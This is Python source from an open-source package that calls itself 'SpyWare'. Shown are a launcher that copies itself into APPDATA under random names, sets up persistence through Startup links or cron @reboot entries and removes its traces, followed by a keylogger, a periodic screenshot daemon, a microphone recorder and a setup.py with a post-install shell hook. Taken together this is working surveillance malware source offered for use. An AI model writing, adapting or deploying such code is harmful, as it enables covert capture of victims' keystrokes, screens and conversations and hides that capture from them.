        daemons.append(daemon)

        if module == "domains":
            thread = Thread(target=daemon.run_CacheDns)
            thread.daemon = True
            threads.append(thread)
            thread.start()

            thread = Thread(target=daemon.run_AppData)
            thread.daemon = True
            threads.append(thread)
            thread.start()
        else:
            thread = Thread(target=daemon.run_for_ever)
            thread.daemon = True
            threads.append(thread)
            thread.start()

    try:
        join_all(*threads)
    except KeyboardInterrupt:
        stop_deamons(*daemons)
    finally:
        join_all(*threads)

    return EXITCODE


def env(keyvalue: str) -> None:

    """
    This function adds environment variables.
    """

    if "=" not in keyvalue:
        raise ValueError(
            "Environment variable should contains a "
            "string key and a string value separate by '='."
        )

    key, value = keyvalue.split("=", 1)
    environ[key] = value


def parse_args() -> Namespace:

    """
    This function parses command line arguments.
    """

    arguments = ArgumentParser(
        description="This file implements a complete spyware."
    )

    add_argument = arguments.add_argument

    add_argument(
        "--env",
        "-e",
        type=env,
        action="extend",
        nargs="*",
        help=(
            "Add environment variable, values "
            "should be formatted as <key>=<value>"
        ),
    )
    add_argument(
        "--install",
        "-i",
        action="store_true",
        help=(
            "Install the spyware in APPDATA and enabled"
            " it (launch on startup)"
        ),
    )
    add_argument(
        "--enable",
        "-E",
        action="store_true",
        help="Enable the spyware (launch it on startup)",
    )
    add_argument(
        "--remove",
        "-r",
        action="store_true",
        help="Remove spyware trace (executable/script, links and data)",
    )
    add_argument(
        "--tar",
        "-t",
        const="",
        nargs="?",
        choices={"gz", "xz", "bz2"},
        help=(
            "Build a tar file with data, optional value should"
            " be 'gz', 'xz', 'bz2' to compress."
        ),
    )

    modules_selection = arguments.add_subparsers(
        dest="modules", help="Modules selection type.", required=False
    )
    add_parser = modules_selection.add_parser

    runonly = add_parser("runonly", help="Run only specified modules.")
    runonly_modules = runonly.add_argument_group(
        "modules", "SpyWare modules to launch in this process."
    )
    runonly_add_argument = runonly_modules.add_argument

    donotrun = add_parser("donotrun", help="Do not run specified modules.")
    donotrun_modules = donotrun.add_argument_group(
        "modules", "SpyWare modules to not launch in this process."
    )
    donotrun_add_argument = donotrun_modules.add_argument

    for module, config in modules.items():
        runonly_add_argument(
            f"--{module}",
            f"-{module[0]}",
            nargs="?",
            const=config,
            help=(
                f"Run module {module} with optional value "
                f"as configuration file (default={config})."
            ),
        )
        donotrun_add_argument(
            f"--{module}",
            f"-{module[0]}",
            action="store_true",
            help=f"Do not run module {module}.",
        )

    return arguments.parse_args()


def get_random_path() -> Tuple[str, str, str]:

    """
    This function returns a random path.
    """

    executable = argv[0]
    extension = splitext(executable)[1]

    if system == "Windows":
        appdata_path = environ["APPDATA"]
    else:
        appdata_path = join(expanduser("~"), ".locals")

    dirnames = [
        join(appdata_path, x.name) for x in scandir(appdata_path) if x.is_dir()
    ]

    filenames = [
        splitext(x.name)[0] + extension
        for dirname in dirnames
        for x in scandir(dirname)
        if x.is_file()
    ]
    filenames.append(
        "".join(choices(ascii_letters + digits, k=choice(range(1, 15))))
        + extension
    )

    dirnames.append(
        join(
            appdata_path,
            "".join(choices(ascii_letters + digits, k=choice(range(1, 15)))),
        )
    )

    filename = choice(filenames)
    dir_name = choice(dirnames)
    path = join(dir_name, filename)

    while exists(path):
        filename = choice(filenames)
        dir_name = choice(dirnames)
        path = join(dir_name, filename)

    return path, dir_name, filename


def install() -> None:

    """
    This function move the SpyWare in APPDATA.
    """

    path, dir_name, filename = get_random_path()
    executable = argv[0]
    executable_dir = dirname(executable)

    if glob(join(executable_dir, "*/*.py")):
        # If is the package source code
        # or multi files executable.
        # The filenames and directories
        # names are not checks to leave
        # the modification right to the user.
        dir_name = join(dir_name, basename(dir_name))
        path = join(dir_name, filename)

        move(join(executable_dir, "."), dir_name)

        executable = join(dir_name, basename(executable))

    makedirs(dir_name, exist_ok=True)

    try:
        rename(executable, path)
    except FileExistsError:
        install()

    chdir(dir_name)
    argv[0] = path
    enabled(path)


def enabled(path: str = argv[0]) -> None:

    """
    This function enables the SpyWare (to start on startup).

    Use cron on UNIX system (try root and user).
    Use StartUp directory on Windows (try all users and user).
    """

    if system == "Windows":
        try:
            link_path = (
                "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs"
                f"\\StartUp\\{basename(path)}.lnk"
            )
            if exists(link_path):
                remove(link_path)
            link(
                path,
                link_path,
            )
        except PermissionError:
            link_path = (
                f"C:\\Users\\{getuser()}\\AppData\\Roaming\\Microsoft\\Wind"
                f"ows\\Start Menu\\Programs\\Startup\\{basename(path)}.lnk"
            )
            if exists(link_path):
                remove(link_path)
            link(
                path,
                link_path,
            )

        return None

    try:
        with open("/var/spool/cron/root") as file:
            print(f"\n@reboot {executable} {path}", file=file)
    except PermissionError:
        with open(f"/var/spool/cron/{getuser()}") as file:
            print(f"\n@reboot {executable} {path}", file=file)


def remove_trace(modules: Dict[str, str] = modules) -> None:

    """
    This function removes trace of SpyWare.
    """

    namespace = globals().copy()
    namespace.update(locals())
    executable_dir = dirname(argv[0])

    if glob(join(executable_dir, "*/*.py")):
        rmtree(executable_dir)
    else:
        for module in modules:
            dir_name = getattr(namespace[f"{module}_config"], "save_dirname", None)
            filename = getattr(
                namespace[f"{module}_config"], "save_filename", None
            )

            if dir_name and exists(dir_name):
                rmtree(dir_name)
            elif filename and exists(filename):
                remove(filename)

        for doc in glob("archive_*.tar*"):
            remove(doc)

        remove(argv[0])

    for config in modules.values():
        if exists(config):
            remove(config)


def archive(modules: Dict[str, str] = modules, mode: str = "") -> str:

    """
    This function archives data.
    """

    name = choices(ascii_letters + digits, k=choice(range(1, 15)))
    filename = f"archive_{name}.tar" + f".{mode}" if mode else mode

    namespace = globals().copy()
    namespace.update(locals())

    with tar_open(filename, f"w:{mode}") as file:

        for module in modules:
            dir_name = getattr(
                namespace[f"{module}_config"], "save_dirname", None
            )
            filename = getattr(
                namespace[f"{module}_config"], "save_filename", None
            )

            if dir_name and exists(dir_name):
                for filename in listdir(dir_name):
                    file.add(filename)
            elif filename and exists(filename):
                file.add(filename)


def cleandict(dict_: dict, keys: List[Hashable]) -> dict:

    """
    This function clean a dictionary.
    """

    for key in keys:
        if key in dict_:
            del dict_[key]
    return dict_


def get_modules(arguments: Namespace) -> Dict[str, str]:

    """
    This function builds the modules dict from arguments.
    """

    modules_config = arguments.__dict__.copy()

    is_mode_donotrun = arguments.modules == "donotrun"

    cleandict(
        modules_config, ["env", "enable", "remove", "modules", "install"]
    )

    if is_mode_donotrun:
        modules_copy = modules.copy()
    else:
        active_modules = {}

    for module, config in modules_config.items():
        if is_mode_donotrun:
            if config is not None:
                del modules_copy[module]
        else:
            if config is not None:
                active_modules[module] = config

    return modules_copy if is_mode_donotrun else active_modules


def main() -> int:

    """
    This function launchs the SpyWare modules from the command line.
    """

    arguments = parse_args()

    if arguments.install:
        install()
    elif arguments.enable:
        enabled()

    if arguments.modules is None:
        active_modules = modules
    else:
        active_modules = get_modules(parse_args())

    tar = arguments.tar
    if arguments.remove:
        register(remove_trace, active_modules)
    elif tar is not None:
        register(archive, active_modules, tar)

    EXITCODE = spy(active_modules)

    # tar = arguments.tar
    # if arguments.remove:
    #     remove_trace(active_modules)
    # elif tar is not None:
    #     archive(active_modules, tar)

    return EXITCODE


if __name__ == "__main__":
    print(copyright)
    exit(main())



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This file implements a keylogger.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This file implements a keylogger.

~# python3 KeyLogger.py keySpy.conf

>>> from os import environ
>>> environ['keySpy.conf'] = 'keySpy.conf'
>>> from SpyWare.KeyLogger import keySpy
>>> keySpy()                  # (using env) OR
>>> keySpy('keySpy.conf')     # (using config file name) OR
>>> keySpy(argv=["KeyLogger.py", "keySpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a complete spyware.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["Daemon", "KeyLogger", "main", "config_load"]

from pynput.keyboard import Key, Listener, Controller, KeyCode
from time import localtime, strftime, struct_time
from os.path import join, dirname, exists
from configparser import ConfigParser
from typing import Union, List
from sys import argv, exit
from os import environ


class CONFIGURATIONS:

    """
    This class contains configurations.
    """

    save_filename: str = "keySpy.txt"
    event_press: int = 0
    event_release: int = 0
    hot_keys: int = 1
    event_time: int = 1


def config_load(filename: str = None, argv: List[str] = argv) -> int:

    """
    This function loads the configuration using a the configuration file.
    """

    CONFIG = ConfigParser()
    default_file_name = "keySpy.conf"

    default_file_path = join(dirname(__file__), default_file_name)
    env_config_file = environ.get(default_file_name)
    arg_config_file = argv[1] if len(argv) == 2 else None

    if filename is not None and exists(filename):
        CONFIG.read(filename)
    elif arg_config_file is not None and exists(arg_config_file):
        CONFIG.read(arg_config_file)
    elif env_config_file and exists(env_config_file):
        CONFIG.read(env_config_file)
    elif exists(default_file_path):
        CONFIG.read(default_file_path)
    else:
        return 1

    CONFIG = CONFIG.__dict__["_sections"]
    CONFIGURATIONS.save_filename = CONFIG.get("SAVE", {}).get(
        "filename", "keySpy.txt"
    )
    CONFIGURATIONS.event_press = int(
        CONFIG.get("SAVE", {}).get("event_press", "0")
    )
    CONFIGURATIONS.event_release = int(
        CONFIG.get("SAVE", {}).get("event_release", "0")
    )
    CONFIGURATIONS.hot_keys = int(CONFIG.get("SAVE", {}).get("hot_keys", "1"))
    CONFIGURATIONS.event_time = int(
        CONFIG.get("SAVE", {}).get("event_time", "1")
    )
    return 0


class KeyLogger:

    """
    This class implements a keylogger.
    """

    def __init__(self):
        self.controller: Controller = Controller()
        filename = self.file = CONFIGURATIONS.save_filename
        self.data_file = open(filename, "a")
        self.is_pressed = set()
        self.counter = 0
        self.run = True
        self.data = ""

    def get_event_press(self, event: Key) -> None:

        """
        This method add a key press event.
        """

        controller = self.controller
        is_pressed = self.is_pressed
        key: str = self.get_event_char(event)

        if CONFIGURATIONS.hot_keys:
            for event in is_pressed:
                key = f"{event} <{key}>"

        if CONFIGURATIONS.event_press:
            key = f"PRESS: {key}"

        if controller.shift_pressed:
            key += " (MAJ)"
        if controller.alt_pressed:
            key += " (ALT)"
        if controller.alt_gr_pressed:
            key += " (ALTGR)"
        if controller.ctrl_pressed:
            key += " (CTRL)"

        is_pressed.add(event)

        self.save(f"{key}\n")
        return self.run

    def get_code(self, event: Union[Key, KeyCode]) -> int:

        """
        This function return the code of Key or KeyCode.
        """

        if isinstance(event, KeyCode):
            code = event.vk
        elif isinstance(event, Key):
            code = event._value_.vk

        return code

    def get_event_release(self, event: Key) -> None:

        """
        This method add a key release event.
        """

        if CONFIGURATIONS.event_release:
            self.save(f"RELEASE: {self.get_event_char(event)}\n")

        # code = self.get_code(event)

        is_pressed = self.is_pressed
        if is_pressed:
            is_pressed.pop()

        return self.run

    def run_for_ever(self) -> None:

        """
        This function starts the keylogger.
        """

        with Listener(
            on_press=self.get_event_press, on_release=self.get_event_release
        ) as listener:
            listener.join()

    def save(self, key: str) -> None:

        """
        This method save pressed keys in file and clean the events list.
        """

        if CONFIGURATIONS.event_time:
            text = f'{strftime("%Y-%m-%d %H:%M:%S")} -> {key}'
        else:
            text = key

        self.counter += 1
        self.data_file.write(text)

        if self.counter >= 1000:
            self.data_file.close()
            self.data_file = open(self.file, "a")
            self.counter = 0

    def get_event_char(self, event: Key) -> str:

        """
        This function get event.char if exist.
        """

        return event.__dict__.get("char") or str(event)


def main(config_filename: str = None, argv: List[str] = argv) -> int:

    """
    This function executes this script from the command line.
    """

    config_load(filename=config_filename, argv=argv)

    daemon = Daemon()

    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False

    return 0


Daemon = KeyLogger

if __name__ == "__main__":
    print(copyright)
    exit(main())



from sys import maxsize, executable, version_info
from setuptools.command.install import install
from setuptools import setup, find_packages
from os import system as exec_command
from platform import system


class PostInstallScript(install):

    """
    This class install the PyAudio module.
    """

    def is_64bit(self) -> bool:

        """
        This function returns True if python is in x64 else returns False.
        """

        return maxsize > 2 ** 32

    def install_pyaudio(self):

        """
        This function install the PyAudio module.
        """

        if system() == "Windows":
            v = f"{version_info.major}{version_info.minor}"

            whl_file = (
                f"PyAudio-0.2.11-cp{v}-cp{v}-win_amd64.whl"
                if self.is_64bit()
                else f"PyAudio-0.2.11-cp{v}-cp{v}-win32.whl"
            )
            exec_command(f'"{executable}" -m pip install "{whl_file}"')
        else:
            exec_command("sudo apt-get install portaudio19-dev python-pyaudio")
            packages.append("pyaudio")

    def run(self):

        """
        Install the package.
        """

        self.install_pyaudio()
        install.run(self)


setup(
    name="SpyWare",
    version="1.0.0",
    packages=find_packages(include=["SpyWare"]),
    install_requires=[
        "pyautogui",
        "opencv-python",
        "pillow",
        "pyperclip",
        "pynput",
    ],
    author="Maurice Lambert",
    author_email="mauricelambert434@gmail.com",
    maintainer="Maurice Lambert",
    maintainer_email="mauricelambert434@gmail.com",
    description="This package implements a complete SpyWare.",
    long_description=open("README.md").read(),
    long_description_content_type="text/markdown",
    include_package_data=True,
    url="https://github.com/mauricelambert/SpyWare",
    classifiers=[
        "Programming Language :: Python",
        "Development Status :: 5 - Production/Stable",
        "Topic :: Security",
        "Environment :: Console",
        "Natural Language :: English",
        "Programming Language :: Python :: 3.9",
        "Operating System :: POSIX :: Linux",
        "Operating System :: Microsoft :: Windows",
        "Operating System :: MacOS",
        "Topic :: Security",
    ],
    cmdclass={
        "install": PostInstallScript,
    },
    entry_points={
        "console_scripts": ["SpyWare = SpyWare:spyware"],
    },
    python_requires=">=3.6",
    keywords=[
        "KeyLogger",
        "SpyWare",
        "WebCam",
        "ClibBoard",
        "DNS Cache",
        "Screen",
        "Recorder",
        "Files",
        "Spy",
    ],
    platforms=["Windows", "Linux", "MacOS"],
    license="GPL-3.0 License",
)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This file implements a SpyWare to capture the screen.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This file implements a SpyWare to capture the screen.

~# python3 ScreenLogger.py screenSpy.conf

>>> from os import environ
>>> environ['screenSpy.conf'] = 'screenSpy.conf'
>>> from SpyWare.ScreenLogger import screenSpy
>>> screenSpy()                  # (using env) OR
>>> screenSpy('screenSpy.conf')  # (using config file name) OR
>>> screenSpy(argv=["ScreenLogger.py", "screenSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a complete spyware.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["Daemon", "main", "config_load"]

from os.path import join, dirname, exists
from configparser import ConfigParser
from pyautogui import screenshot
from os import makedirs, environ
from sys import argv, exit
from typing import List
from time import sleep
from glob import glob


class CONFIGURATIONS:

    """
    This class contains configurations.
    """

    save_filename: str = "screenshot*.png"
    save_dirname: str = "screenshots"
    screenshot_interval: int = 3600


def config_load(filename: str = None, argv: List[str] = argv) -> int:

    """
    This function loads the configuration using a the configuration file.
    """

    CONFIG = ConfigParser()
    default_file_name = "screenSpy.conf"

    default_file_path = join(dirname(__file__), default_file_name)
    env_config_file = environ.get(default_file_name)
    arg_config_file = argv[1] if len(argv) == 2 else None

    if filename is not None and exists(filename):
        CONFIG.read(filename)
    elif arg_config_file is not None and exists(arg_config_file):
        CONFIG.read(arg_config_file)
    elif env_config_file and exists(env_config_file):
        CONFIG.read(env_config_file)
    elif exists(default_file_path):
        CONFIG.read(default_file_path)
    else:
        return 1

    CONFIG = CONFIG.__dict__["_sections"]
    CONFIGURATIONS.save_filename = CONFIG.get("SAVE", {}).get(
        "filename", "screenshot*.png"
    )
    CONFIGURATIONS.save_dirname = CONFIG.get("SAVE", {}).get(
        "dirname", "screenshots"
    )
    CONFIGURATIONS.screenshot_interval = float(
        CONFIG.get("TIME", {}).get("screenshot_interval", "3600")
    )
    return 0


class Daemon:

    """
    This class implements a loop to capture screen
    while the spyware is running.
    """

    def __init__(self):
        self.interval = CONFIGURATIONS.screenshot_interval
        self.run = True
        path = self.path = join(
            CONFIGURATIONS.save_dirname, CONFIGURATIONS.save_filename
        )
        self.increment = len(glob(path))

    def run_for_ever(self) -> None:

        """
        This function takes the screenshot and sleep in a loop.
        """

        makedirs(CONFIGURATIONS.save_dirname, exist_ok=True)
        increment = self.increment
        interval = self.interval

        while self.run:
            screenshot(self.path.replace("*", str(increment)))
            increment += 1
            if self.run:
                sleep(interval)


def main(config_filename: str = None, argv: List[str] = argv) -> int:

    """
    This function executes this script from the command line.
    """

    config_load(filename=config_filename, argv=argv)

    daemon = Daemon()

    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False

    return 0


if __name__ == "__main__":
    print(copyright)
    exit(main())



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This package implements a SpyWare to record from microphone.
#    Copyright (C) 2021, 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This package implements a SpyWare to record from microphone.

~# python3 AudioLogger.py audioSpy.conf

>>> from os import environ
>>> environ['audioSpy.conf'] = 'audioSpy.conf'
>>> from SpyWare.AudioLogger import audioSpy
>>> audioSpy()                  # (using env) OR
>>> audioSpy('audioSpy.conf') # (using config file name) OR
>>> audioSpy(argv=["AudioLogger.py", "audioSpy.conf"]) # (using argv)
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This module implements a SpyWare to record from microphone.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/SpyWare"

copyright = """
SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = ["main", "Daemon", "config_load"]

from os.path import join, exists, dirname
from configparser import ConfigParser
from pyaudio import PyAudio, paInt16
from wave import open as wave_open
from os import makedirs, environ
from sys import argv, exit
from typing import List
from time import sleep
from glob import glob


class CONFIGURATIONS:

    """
    This class contains configurations.
    """

    save_filename: str = "record*.wav"
    save_dirname: str = "records"
    record_time: float = 10
    interval: float = 3590
    FORMAT: int = paInt16
    CHUNK: int = 1024
    CHANNELS: int = 2
    RATE: int = 44100


def config_load(filename: str = None, argv: List[str] = argv) -> None:

    """
    This function loads the configuration using a the configuration file.
    """

    CONFIG = ConfigParser()

    default_file_name = "audioSpy.conf"
    default_file_path = join(dirname(__file__), default_file_name)
    env_config_file = environ.get(default_file_name)
    arg_config_file = argv[1] if len(argv) == 2 else None

    if filename is not None and exists(filename):
        CONFIG.read(filename)
    elif arg_config_file is not None and exists(arg_config_file):
        CONFIG.read(arg_config_file)
    elif env_config_file and exists(env_config_file):
        CONFIG.read(env_config_file)
    elif exists(default_file_path):
        CONFIG.read(default_file_path)
    else:
        return 1

    CONFIG = CONFIG.__dict__["_sections"]
    CONFIGURATIONS.save_filename = CONFIG.get("SAVE", {}).get(
        "filename", "record*.wav"
    )
    CONFIGURATIONS.record_time = float(
        CONFIG.get("TIME", {}).get("record_time", "10")
    )
    CONFIGURATIONS.interval = float(
        CONFIG.get("TIME", {}).get("interval", "3590")
    )
    CONFIGURATIONS.save_dirname = CONFIG.get("SAVE", {}).get(
        "records", "records"
    )
    return 0


class Daemon:

    """
    This class implements a loop to record from microphone.
    """

    def __init__(self):
        self.interval = CONFIGURATIONS.interval
        self.run = True
        path = self.path = join(
            CONFIGURATIONS.save_dirname, CONFIGURATIONS.save_filename
        )
        self.increment = len(glob(path))
        self.pyaudio = PyAudio()

    def run_for_ever(self) -> None:

        """
        This function record from microphone and sleep for ever.
        """

        makedirs(CONFIGURATIONS.save_dirname, exist_ok=True)
        internval = self.interval
        path = self.path
        increment = self.increment

        while self.run:
            self.save_record(
                path.replace("*", str(increment)), CONFIGURATIONS.record_time
            )
            increment += 1

            if self.run:
                sleep(internval)

    def save_record(self, filename: str, time: int) -> None:

        """
        This function records from microphone and save in wave file.
        """

        pyaudio = self.pyaudio
        format_ = CONFIGURATIONS.FORMAT
        channels = CONFIGURATIONS.CHANNELS
        rate = CONFIGURATIONS.RATE
        chunk = CONFIGURATIONS.CHUNK

        stream = pyaudio.open(
            format=format_,
            channels=channels,
            rate=rate,
            input=True,
            frames_per_buffer=chunk,
        )

        # frames = b"".join(
        #     [stream.read(chunk) for i in range(0, int(rate / chunk * time))]
        # )

        wf = wave_open(filename, "wb")
        wf.setnchannels(channels)
        wf.setsampwidth(pyaudio.get_sample_size(format_))
        wf.setframerate(rate)
        wf.writeframes(stream.read(round(rate * time)))
        wf.close()

        stream.stop_stream()
        stream.close()
        pyaudio.terminate()


def main(config_filename: str = None, argv: List[str] = argv) -> int:

    """
    This function starts the recorder
    daemon from the command line.
    """

    config_load(filename=config_filename, argv=argv)

    daemon = Daemon()
    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False

    return 0


if __name__ == "__main__":
    print(copyright)
    exit(main())
